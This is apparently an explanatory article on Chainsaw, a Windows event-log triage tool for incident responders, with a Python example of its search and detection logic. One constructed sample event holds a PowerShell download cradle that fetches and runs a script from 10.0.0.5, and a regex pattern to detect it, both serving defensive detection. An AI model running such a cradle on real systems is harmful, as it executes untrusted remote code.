Chainsaw is a tool designed to assist in the first-response stage of a security engagement; it also helps blue teams triage the Windows event log records relevant to an investigation.
Windows event logs are a ledger of the system’s activities, comprising details about applications and user logins. Forensic investigators rely on these records, sometimes as the main source of evidence, to create a timeline of events of interest.
The difficulty with checking these records is that there are a lot of them, especially on systems with a high logging level; sifting through them for relevant information can be a time-consuming task.
Chainsaw is a Rust-based command-line utility that goes through event logs to highlight suspicious entries or strings that may indicate a threat. It contains built-in logic for detection use-cases that are not suited to Sigma rules, and provides a simple interface to search through event logs by keyword, regex pattern, or specific event ID.
Threat hunters and incident responders can use Chainsaw’s search features to extract information pertinent to malicious activity from Windows logs.
Chainsaw uses the EVTX parser library to read log files and the detection-logic matching provided by F-Secure Countercept’s TAU Engine library. It can output results as an ASCII table, CSV, or JSON.
Users can use the tool to:
- Search through event logs by event ID, keyword, and regex pattern
- Extract and parse Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts
- Detect key event logs being cleared or the event log service being stopped
- Detect users being created or added to sensitive user groups
- Detect brute-force attempts against local user accounts
- Detect RDP logins, network logins, etc.
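To make the search features and the built-in detections above concrete, here is an added example (written for this page, not Chainsaw's own code or the TAU Engine) that runs a simplified version of the same logic over a handful of constructed event records. It assumes the records have already been parsed from EVTX into the `System`/`EventData` shape a JSON dump of an event log takes; the host, user names and IP addresses in the sample log are hypothetical. The event IDs it keys on (1102/104 log cleared, 1100 logging service stopped, 4720 user created, 4728/4732/4756 group membership added, 4625/4624 failed/successful logon, logon type 10 for RDP and 3 for network) are the documented Windows ones.

```python
"""Chainsaw-style triage over Windows event log records: search by event ID,
keyword or regex, plus built-in detections. Added example, not Chainsaw's code."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Event IDs the detections key on (documented Windows Security/System IDs).
LOG_CLEARED = {1102, 104}                # Security audit log / System log cleared
LOG_SERVICE_STOPPED = {1100}             # event logging service shut down
USER_CREATED = {4720}
GROUP_MEMBER_ADDED = {4728, 4732, 4756}  # security-enabled global/local/universal group
FAILED_LOGON, SUCCESSFUL_LOGON = 4625, 4624
RDP_LOGON_TYPE, NETWORK_LOGON_TYPE = 10, 3
SENSITIVE_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins",
                    "Backup Operators", "Remote Desktop Users"}

def _ev(event_id, ts, data, channel="Security"):
    """Build one record in the shape an EVTX file takes when dumped to JSON."""
    return {"System": {"EventID": event_id, "TimeCreated": ts.isoformat(), "Channel": channel},
            "EventData": data}

# Constructed sample log (hypothetical users/addresses): a burst of failed logons
# against 'admin', an RDP logon, a new account added to Administrators, a
# suspicious PowerShell script block, and the audit log being cleared.
_T0 = datetime(2024, 3, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    _ev(FAILED_LOGON, _T0 + timedelta(seconds=10 * i),
        {"TargetUserName": "admin", "IpAddress": "10.0.0.5", "LogonType": 3})
    for i in range(6)
] + [
    _ev(SUCCESSFUL_LOGON, _T0 + timedelta(minutes=2),
        {"TargetUserName": "admin", "IpAddress": "10.0.0.5", "LogonType": 10}),
    _ev(4720, _T0 + timedelta(minutes=3),
        {"TargetUserName": "svc_backup", "SubjectUserName": "admin"}),
    _ev(4732, _T0 + timedelta(minutes=4),
        {"TargetUserName": "Administrators", "MemberName": "svc_backup", "SubjectUserName": "admin"}),
    _ev(4104, _T0 + timedelta(minutes=5),
        {"ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"},
        channel="Microsoft-Windows-PowerShell/Operational"),
    _ev(1102, _T0 + timedelta(minutes=6), {"SubjectUserName": "admin"}),
]

def search(events, event_id=None, keyword=None, regex=None, ignore_case=False):
    """Return the events matching every criterion given (event ID, substring, regex)."""
    pattern = re.compile(regex, re.IGNORECASE if ignore_case else 0) if regex else None
    hits = []
    for ev in events:
        if event_id is not None and ev["System"]["EventID"] != event_id:
            continue
        text = json.dumps(ev)  # match against the whole serialised record, like a grep over the log
        if keyword and (keyword.lower() not in text.lower() if ignore_case else keyword not in text):
            continue
        if pattern and not pattern.search(text):
            continue
        hits.append(ev)
    return hits

def detect(events, brute_threshold=5, window=timedelta(minutes=5)):
    """Run the built-in detections; return (rule, timestamp, detail) tuples in log order."""
    findings = []
    failures = defaultdict(list)  # (source IP, account) -> failed-logon timestamps
    for ev in events:
        eid, ts, d = ev["System"]["EventID"], ev["System"]["TimeCreated"], ev["EventData"]
        if eid in LOG_CLEARED:
            findings.append(("event_log_cleared", ts, f"by {d.get('SubjectUserName')}"))
        elif eid in LOG_SERVICE_STOPPED:
            findings.append(("event_log_service_stopped", ts, ""))
        elif eid in USER_CREATED:
            findings.append(("user_created", ts, f"{d['TargetUserName']} by {d.get('SubjectUserName')}"))
        elif eid in GROUP_MEMBER_ADDED and d.get("TargetUserName") in SENSITIVE_GROUPS:
            findings.append(("sensitive_group_member_added", ts, f"{d['MemberName']} -> {d['TargetUserName']}"))
        elif eid == SUCCESSFUL_LOGON and d.get("LogonType") == RDP_LOGON_TYPE:
            findings.append(("rdp_logon", ts, f"{d['TargetUserName']} from {d.get('IpAddress')}"))
        elif eid == SUCCESSFUL_LOGON and d.get("LogonType") == NETWORK_LOGON_TYPE:
            findings.append(("network_logon", ts, f"{d['TargetUserName']} from {d.get('IpAddress')}"))
        elif eid == FAILED_LOGON:
            failures[(d.get("IpAddress"), d["TargetUserName"])].append(datetime.fromisoformat(ts))
    # Brute force: at least `brute_threshold` failures for one source/account inside `window`.
    for (ip, user), times in failures.items():
        times.sort()
        for i in range(len(times) - brute_threshold + 1):
            if times[i + brute_threshold - 1] - times[i] <= window:
                findings.append(("brute_force", times[i].isoformat(),
                                 f"{brute_threshold}+ failed logons for {user} from {ip} within {window}"))
                break
    return findings

if __name__ == "__main__":
    for rule, ts, detail in detect(SAMPLE_EVENTS):
        print(f"{ts}  {rule:<30} {detail}")
    # Search: PowerShell script-block events (4104) whose text contains a download cradle.
    for ev in search(SAMPLE_EVENTS, event_id=4104, regex=r"DownloadString\(", ignore_case=True):
        print(ev["System"]["TimeCreated"], ev["EventData"]["ScriptBlockText"])
```

The brute-force check is the one detection that needs state across records: it groups failed logons by source address and account and only fires when the threshold is reached inside the time window, which is why six failures ten seconds apart produce a single finding rather than six. Raising the threshold (or shrinking the window) suppresses it, which is the knob a responder tunes for noisy environments.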